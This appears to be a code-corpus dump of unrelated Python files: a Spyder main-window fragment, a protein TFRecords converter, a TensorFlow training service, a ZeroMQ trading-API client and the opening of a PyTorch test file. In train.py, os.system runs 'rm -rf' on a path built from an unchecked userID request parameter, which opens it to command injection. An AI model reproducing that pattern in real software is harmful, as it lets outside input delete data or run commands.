startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
""" """
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global File Switcher
def open_fileswitcher(self, symbol=False):
"""Open file list management dialog box."""
if self.fileswitcher is not None and \
self.fileswitcher.is_visible:
self.fileswitcher.hide()
self.fileswitcher.is_visible = False
return
if symbol:
self.fileswitcher.plugin = self.editor
self.fileswitcher.set_search_text('@')
else:
self.fileswitcher.set_search_text('')
self.fileswitcher.show()
self.fileswitcher.is_visible = True
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_fileswitcher(symbol=True)
def add_to_fileswitcher(self, plugin, tabs, data, icon):
"""Add a plugin to the File Switcher."""
if self.fileswitcher is None:
self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon)
else:
self.fileswitcher.add_plugin(plugin, tabs, data, icon)
self.fileswitcher.sig_goto_file.connect(
plugin.get_current_tab_manager().set_stack_index)
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used when after startup (when using the
# menu action, and gives feeback if updates are, or are not found.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = __project_url__ + '/releases'
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
anaconda_msg = ''
if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
"that you are using Spyder with "
"<b>Anaconda/Miniconda</b>. Please "
"<b>don't</b> use <code>pip</code> to "
"update it as that will probably break "
"your installation.<br><br>"
"Instead, please wait until new conda "
"packages are available and use "
"<code>conda</code> to perform the "
"update.<hr>")
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
msg += '<br>' + anaconda_msg
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feeback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
# --- Set application icon
app.setWindowIcon(APP_ICON)
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
if running_under_pytest():
try:
from unittest.mock import Mock
except ImportError:
from mock import Mock # Python 2
options = Mock()
options.working_directory = None
options.profile = False
options.multithreaded = False
options.new_instance = False
options.open_project = None
options.window_title = None
app = initialize()
window = run_spyder(app, options, None)
return window
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, optparse won't be able to exit if --help option is passed
options, args = get_options()
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize or bool(DEBUG))
app = initialize()
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# Show crash dialog
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
if SPLASH is not None:
SPLASH.hide()
QMessageBox.information(
None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>spyder --reset</b></span>"
"<br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If Spyder still fails to launch, you should consult our "
"comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, "
"which when followed carefully solves the vast majority of "
"crashes; also, take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"submitting a report to our <a href=\"%s\">issue tracker</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __trouble_url__, __project_url__,
__forum_url__, __project_url__))
# Create main window
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('main', 'icon_theme', 'spyder 2')
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occured
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
cUR50_tfrecords.py
|
# convert a pandas DataFrame of amino acid sequence, secondary structure
# sequence pairs into TF records
from multiprocessing import Process, Queue
from pathlib import Path
from glob import glob
import mmap
import pandas as pd
import numpy as np
import tensorflow as tf
from sklearn.model_selection import KFold
from proteinfeatures.features import prot_to_vector
HOME = str(Path.home())
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _floats_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def write_file(filename, data):
"""
Write a dataframe of records to a file.
"""
num_written = 0
num_skipped = 0
with tf.python_io.TFRecordWriter(filename) as writer:
for index in range(data.shape[0]):
sample = data.iloc[index]
# convert the strings to
try:
seq_id = bytes(sample.id, "utf-8")
seq_len = len(sample.seq)
seq = bytes(sample.seq, "utf-8")
seq_phyche = prot_to_vector(sample.seq).reshape(-1)
tf_example = tf.train.Example(features=tf.train.Features(feature={
"id": _bytes_feature(seq_id),
"seq_len": _int64_feature(seq_len),
"seq": _bytes_feature(seq),
"seq_phyche": _floats_feature(seq_phyche)}))
writer.write(tf_example.SerializeToString())
num_written += 1
except Exception as e:
print("Exception encountered while processing index %d" % index)
print(e)
print(sample.id)
num_skipped += 1
return num_written, num_skipped
def worker(wid, worker_queue, done_queue):
"""
A worker processes views of the dataframe of records and writes them to
files.
It also tracks the total number of records written and skipped.
"""
files_written = 0
total_written = 0
total_skipped = 0
while True:
(filename, data) = worker_queue.get()
# check if done
if filename is None:
done_queue.put((total_written, total_skipped))
return
written, skipped = write_file(filename, data)
files_written += 1
total_written += written
total_skipped += skipped
if files_written % 5 == 0:
print("Worker %d:: %d total files, last file: %s \
\n\t- records written: %d, records skipped: %d\n" % (wid, files_written, filename, total_written, total_skipped))
def cUR50_to_tfrecords():
"""
Convert a pandas dataframe of protein sequences into a TFRecord
format.
"""
num_workers = 5
worker_queue = Queue(maxsize=10)
done_queue = Queue()
print("Spawning %d workers." % (num_workers))
workers = []
for i in range(num_workers):
p = Process(target=worker, args=(i, worker_queue, done_queue))
workers.append(p)
p.start()
files = ["cur50.csv"]
# the global count of output files
outfile_count = 0
outfile_prefix = HOME+"/data/cUR50/tfrecords/"
# find the last output file that was written
sorted_files = sorted(glob(outfile_prefix+"cur50_*.tfrecords"))
if len(sorted_files) > 0:
last_file = Path(sorted_files[-1]).stem
start_count = int(last_file.split("_")[-1]) - num_workers
start_count = start_count if start_count > 0 else 0
else:
start_count = 0
print("Starting at outfile #%d\n" % (start_count))
filesize = 1000
# for each subset of uniref50, containing a few million proteins
for f in files:
print("Processing %s\n" % f)
with open(HOME+"/data/cUR50/"+f, "r") as f_:
mm = mmap.mmap(f_.fileno(), 0, access=mmap.ACCESS_READ)
data = pd.read_csv(mm)
num_seqs = data.shape[0]
# split into tfrecord files, each with filesize (1000) proteins
num_outfiles = num_seqs // filesize if num_seqs % filesize == 0 else (num_seqs // filesize) + 1
print("\tNum Files: %d\n" % num_outfiles)
# pass views of the dataframe into the queue
for i in range(num_outfiles):
# NOTE: if the file already exists, skip it
if outfile_count < start_count:
outfile_count += 1
continue
outfile = outfile_prefix+"cur50_%05d.tfrecords" % (outfile_count)
start_index = i*filesize
end_index = (i+1)*filesize if (i+1)*filesize < num_seqs else num_seqs
worker_queue.put((outfile, data.iloc[start_index:end_index]))
outfile_count += 1
# pass stop signal to workers
for _ in range(num_workers):
worker_queue.put((None, None))
total_written = 0
total_skipped = 0
for _ in range(num_workers):
(records_written, records_skipped) = done_queue.get()
total_written += records_written
total_skipped += records_skipped
print("%d records written, %d records skipped" % (total_written, total_skipped))
print("Joining workers")
for p in workers:
p.join()
if __name__ == "__main__":
cUR50_to_tfrecords()
|
train.py
|
#!/home/zhuqingjie/env/py3_tf_low/bin/python
'''
@Time : 08.05 0005 下午 01:45
@Author : zhuqingjie
@User : zhu
@FileName: train.py
@Software: PyCharm
'''
import json, os, cv2, sys, time
import tensorflow as tf
from threading import Thread
# #################################### 测试GPU能不能用 #############################################
# def get_available_gpus():
# """
# code from http://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow
# """
# from tensorflow.python.client import device_lib as _device_lib
# local_device_protos = _device_lib.list_local_devices()
# print('get_available_gpus---------------------')
# for x in local_device_protos:
# if x.device_type == 'GPU':
# print(x.name)
# # return [x.name for x in local_device_protos if x.device_type == 'GPU']
#
#
# get_available_gpus()
# print(tf.__version__)
# exit()
# #################################### 测试GPU能不能用 #############################################
'''
注意:tf 1.14 对应cuda版本10.0 对应的cudnn是7.4.2
'''
from flask import Flask, request
sys.path.append('/home/zhangli_lab/zhuqingjie/prj/tunet_onesample')
# from color import Colored as C
# from model import UNET as G
import config as cf
import SERVER.someconfig as somecf
import numpy as np
from SERVER.data_preprocess import process, get_batch
# import config as cf
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(list(map(str, cf.gpus)))
print_ = lambda x: print(f"--> [{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}]: {x}")
printc = lambda s: print(f"\033[1;35m{s}\033[0m")
printc(tf.__version__)
# 异步装饰器
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@async
def train(userid, sr_or_os, s, epochs=cf.epoch, batch_size=cf.batch_size):
'''
userid是一个关键的参数,利用它判断训练数据在哪以及生产的模型要保存的地方,
所以该函数不需要传入数据路径以及不需要返回模型地址
:param userid:
:param epochs:
:return:
'''
# 选择模型拓扑结构
if sr_or_os == 'sr':
from model import UNET_sr as G
model_path = somecf.Release_model_path_sr
elif sr_or_os == 'os':
from model import UNET_os as G
model_path = somecf.Release_model_path_os
else:
print('train.py: line 42, [sr_or_os] must be "sr" or "os".')
exit()
# 读取训练数据
data_dir = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/data_temp'
datas_x = np.load(os.path.join(data_dir, f'{userid}_x.npy'))
datas_y = np.load(os.path.join(data_dir, f'{userid}_y.npy'))
print_(f'train datas_x.shape:{datas_x.shape}')
print_(f'train datas_y.shape:{datas_y.shape}')
# get model path
flist = os.listdir(model_path)
for f in flist:
if ".meta" in f:
model_ind = f.split('.')[0]
break
checkpoint_path = os.path.join(model_path, model_ind)
# train
h, w = datas_y.shape[1:3]
g = G(H=h, W=w)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.33333
# config.gpu_options.allow_growth = True
with tf.Session(graph=g.graph, config=config) as sess:
var_list_G = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'generator')
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
bn_moving_vars = [g for g in bn_moving_vars if 'generator' in g.name]
saver = tf.train.Saver(max_to_keep=1, var_list=var_list_G + bn_moving_vars)
sess.run(tf.global_variables_initializer())
saver.restore(sess, checkpoint_path)
for ep in range(epochs):
bxs, bys = get_batch(datas_x, datas_y)
print_(f'get_batch bxs.shape:{bxs.shape}')
print_(f'get_batch bys.shape:{bys.shape}')
for batch_xs, batch_ys in zip(bxs, bys):
_, _, gs = sess.run(
[g.train_op_G, g.train_op_D, g.global_step],
feed_dict={g.x: batch_xs, g.y: batch_ys}
)
print_(f'epoch:{ep}/{cf.epoch}')
saver_path = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/model_temp/{userid}'
os.mkdir(saver_path)
saver.save(sess, f'{saver_path}/model')
print_('train finished.')
sess.close()
s.in_training = False
pass
def handle(dic_url, sr_or_os, saved_dir, s):
print('\n')
print('-' * 50)
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
# 初始化输出信息
status = -1
info = 'initialization info'
check_path = 'null'
# 这里是个假循环,只是为了利用break特性
while True:
# 读取参数
error_param = 'error_param'
src_path = dic_url.get('src_path', error_param)
mode = dic_url.get('mode', error_param)
donotsave = dic_url.get('donotsave', error_param)
userID = dic_url.get('userID', error_param)
print_(f'\n\tsrc_path: {src_path}\n\tmode: {mode}\n\tdonotsave: {donotsave}\n\tuserID: {userID}')
if error_param in [src_path, mode, donotsave, userID]:
info = 'params error!'
break
# 检查参数是否正确
xypaths = [p.strip() for p in src_path.split() if p]
if len(xypaths) == 0:
info = 'param error: src_path'
break
flagerr_xyp = 0
for xyp in xypaths:
if ',' not in xyp:
flagerr_xyp = 1
if flagerr_xyp == 1:
info = 'param error: src_path'
break
# 判断文件是否存在
existed_flag = 0
for xyp in xypaths:
xp, yp = xyp.split(',')[0], xyp.split(',')[1]
if os.path.exists(xp) and os.path.exists(yp):
continue
else:
existed_flag = 1
break
if existed_flag == 1:
info = 'data error: the files of "src_path" is not existed!'
break
# 判断文件shape是否一致,以及,图像是否能读取,图像是否过小或过大
try:
shape_flag = 0
hw_flag = 0
for xyp in xypaths:
xp, yp = xyp.split(',')[0], xyp.split(',')[1]
xp_img = cv2.imread(xp)
yp_img = cv2.imread(yp)
h, w = xp_img.shape[:2]
if xp_img.shape != yp_img.shape:
shape_flag = 1
break
if h < 512 or w < 512 or h > 10000 or w > 10000:
hw_flag = 1
if shape_flag == 1:
info = 'data error: the shape of images is not identical!'
break
if hw_flag == 1:
info = "data error: the size of images is too small or too big! limit:512*512 -> 10000*10000"
break
except:
info = 'data error: read images failed!'
break
try:
# 处理数据及保存数据
process(src_path, userID, sr_or_os, saved_dir, donotsave)
except:
info = 'process data error!'
break
# train,训练数据,保存模型
os.system(
f"rm -rf /home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/model_temp/{userID}")
train(userID, sr_or_os, s)
# saved model path
model_path = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/model_temp/{userID}'
check_path = model_path
info = 'training...'
status = 0
break
# return
print_(f"\n\treturn:\n\tstatus: {status},\n\tinfo: {info},\n\tcheck_path: {check_path}")
print_('done.')
return json.dumps({
'status': status,
'info': info,
'check_path': check_path
})
if __name__ == '__main__':
dic_url = {
'src_path': '/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample_temp/pics/sr_x.bmp,/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample_temp/pics/sr_predict.bmp',
'mode': 3,
'donotsave': 0,
'userID': 'zhuqingjie_test'
}
class St():
def __init__(self):
self.in_training = False
s = St()
sr_or_os = 'sr'
saved_dir = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}'
handle(dic_url, sr_or_os, saved_dir, s)
|
tcoreapi_mq.py
|
import zmq
import json
import re
import threading
class TCoreZMQ():
def __init__(self,APPID,SKey):
self.context = zmq.Context()
self.appid=APPID
self.ServiceKey=SKey
self.lock = threading.Lock()
self.m_objZMQKeepAlive = None
#连线登入
def Connect(self, port):
self.lock.acquire()
login_obj = {"Request":"LOGIN","Param":{"SystemName":self.appid, "ServiceKey":self.ServiceKey}}
self.socket = self.context.socket(zmq.REQ)
self.socket.connect("tcp://127.0.0.1:%s" % port)
self.socket.send_string(json.dumps(login_obj))
message = self.socket.recv()
message = message[:-1]
data = json.loads(message)
self.lock.release()
if data["Success"] == "OK":
self.CreatePingPong(data["SessionKey"], data["SubPort"])
return data
def CreatePingPong(self, sessionKey, subPort):
if self.m_objZMQKeepAlive != None:
self.m_objZMQKeepAlive.Close()
self.m_objZMQKeepAlive = KeepAliveHelper(subPort, sessionKey, self)
return
#连线登出
def Logout(self, sessionKey):
self.lock.acquire()
obj = {"Request":"LOGOUT","SessionKey":sessionKey}
self.socket.send_string(json.dumps(obj))
self.lock.release()
return
#查询合约信息
def QueryInstrumentInfo(self, sessionKey, symbol):
self.lock.acquire()
obj = {"Request" : "QUERYINSTRUMENTINFO" , "SessionKey" : sessionKey , "Symbol" : symbol}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#查询对应类型的所有合约
#"Type":
#期货:Future
#期权:Options
#证券:Stock
def QueryAllInstrumentInfo(self, sessionKey, type):
self.lock.acquire()
obj = {"Request": "QUERYALLINSTRUMENT", "SessionKey": sessionKey, "Type": type}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#连线心跳(在收到"PING"消息时调用)
def Pong(self, sessionKey, id = ""):
self.lock.acquire()
obj = {"Request":"PONG","SessionKey":sessionKey, "ID":id}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
class TradeAPI(TCoreZMQ):
def __init__(self,APPID, SKey):
super().__init__(APPID, SKey)
#已登入资金账户
def QryAccount(self, sessionKey):
self.lock.acquire()
obj = {"Request":"ACCOUNTS","SessionKey":sessionKey}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#查询当日委托回报
def QryReport(self, sessionKey, qryIndex):
self.lock.acquire()
obj = {"Request":"RESTOREREPORT","SessionKey":sessionKey,"QryIndex":qryIndex}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#查询当日成交回报
def QryFillReport(self, sessionKey, qryIndex):
self.lock.acquire()
obj = {"Request":"RESTOREFILLREPORT","SessionKey":sessionKey,"QryIndex":qryIndex}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#下单
def NewOrder(self, sessionKey, param):
self.lock.acquire()
obj = {"Request":"NEWORDER","SessionKey":sessionKey}
obj["Param"] = param
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#改单
def ReplaceOrder(self, sessionKey, param):
self.lock.acquire()
obj = {"Request":"REPLACEORDER","SessionKey":sessionKey}
obj["Param"] = param
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#删单
def CancelOrder(self, sessionKey, param):
self.lock.acquire()
obj = {"Request":"CANCELORDER","SessionKey":sessionKey}
obj["Param"] = param
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#查询资金
def QryMargin(self, sessionKey, accountMask):
self.lock.acquire()
obj = {"Request":"MARGINS","SessionKey":sessionKey,"AccountMask":accountMask}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#查询持仓
def QryPosition(self, sessionKey, accountMask, qryIndex):
self.lock.acquire()
obj = {"Request":"POSITIONS","SessionKey":sessionKey,"AccountMask":accountMask,"QryIndex":qryIndex}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
class QuoteAPI(TCoreZMQ):
def __init__(self,APPID, SKey):
super().__init__(APPID, SKey)
#订阅实时报价
def SubQuote(self, sessionKey, symbol):
self.lock.acquire()
obj = {"Request":"SUBQUOTE","SessionKey":sessionKey}
obj["Param"] ={"Symbol":symbol,"SubDataType":"REALTIME"}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#解订实时报价(每次订阅合约前,先调用解订,避免重复订阅)
def UnsubQuote(self, sessionKey, symbol):
self.lock.acquire()
obj = {"Request":"UNSUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol":symbol,"SubDataType":"REALTIME"}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#订阅实时greeks
def SubGreeks(self, sessionKey, symbol, greeksType = "REAL"):
self.lock.acquire()
obj = {"Request":"SUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol":symbol,"SubDataType":"GREEKS","GreeksType":greeksType}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#解订实时greeks(每次订阅合约前,先调用解订,避免重复订阅)
def UnsubGreeks(self, sessionKey, symbol, greeksType = "REAL"):
self.lock.acquire()
obj = {"Request":"UNSUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol":symbol,"SubDataType":"GREEKS","GreeksType":greeksType}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#订阅历史数据
#1:SessionKey,
#2:合约代码,
#3:数据周期:"TICKS","1K","DK",
#4: 历史数据开始时间,
#5: 历史数据结束时间
def SubHistory(self, sessionKey, symbol, type, startTime, endTime):
self.lock.acquire()
obj = {"Request":"SUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol": symbol,"SubDataType":type,"StartTime" :startTime,"EndTime" :endTime}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#解订历史数据(遗弃,不再使用)
#1:SessionKey,
#2:合约代码,
#3:数据周期"TICKS","1K","DK",
#4: 历史数据开始时间,
#5: 历史数据结束时间
def UnsubHistory(self, sessionKey, symbol, type, startTime, endTime):
self.lock.acquire()
obj = {"Request":"UNSUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol": symbol,"SubDataType":type,"StartTime" :startTime,"EndTime" :endTime}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
#分页获取订阅的历史数据
def GetHistory(self, sessionKey, symbol, type, startTime, endTime, qryIndex):
self.lock.acquire()
obj = {"Request":"GETHISDATA","SessionKey":sessionKey}
obj["Param"] = {"Symbol": symbol,"SubDataType":type,"StartTime" :startTime,"EndTime" :endTime,"QryIndex" :qryIndex}
self.socket.send_string(json.dumps(obj))
message = (self.socket.recv()[:-1]).decode("utf-8")
index = re.search(":",message).span()[1] # filter
message = message[index:]
message = json.loads(message)
self.lock.release()
return message
class KeepAliveHelper():
def __init__(self, subPort, session, objZMQ):
threading.Thread(target = self.ThreadProcess, args=(subPort, session, objZMQ)).start()
self.IsTerminal = False
def Close(self):
self.IsTerminal = True
def ThreadProcess(self, subPort, session, objZMQ):
socket_sub = zmq.Context().socket(zmq.SUB)
socket_sub.connect("tcp://127.0.0.1:%s" % subPort)
socket_sub.setsockopt_string(zmq.SUBSCRIBE,"")
while True:
message = (socket_sub.recv()[:-1]).decode("utf-8")
findText = re.search("{\"DataType\":\"PING\"}",message)
if findText == None:
continue
if self.IsTerminal:
return
objZMQ.Pong(session, "TC")
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
